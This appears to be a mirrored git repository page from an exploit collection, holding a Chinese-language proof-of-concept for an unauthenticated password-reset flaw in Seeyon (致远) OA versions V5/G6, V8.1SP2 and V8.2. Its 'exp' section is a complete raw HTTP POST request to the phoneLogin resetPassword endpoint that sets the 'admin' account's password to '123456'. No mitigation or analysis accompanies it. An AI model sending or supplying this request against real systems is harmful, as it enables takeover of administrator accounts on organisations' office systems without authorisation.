admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/致远OA/致远OA前台任意用户密码修改漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

347 B
Raw Blame History

致远OA前台任意用户密码修改漏洞

版本

Seeyon OA=V5/G6
Seeyon OA=V8.1SP2
Seeyon OA=V8.2

exp

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: ip
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/json
Accept-Encoding: gzip

{"loginName":"admin","password":"123456"}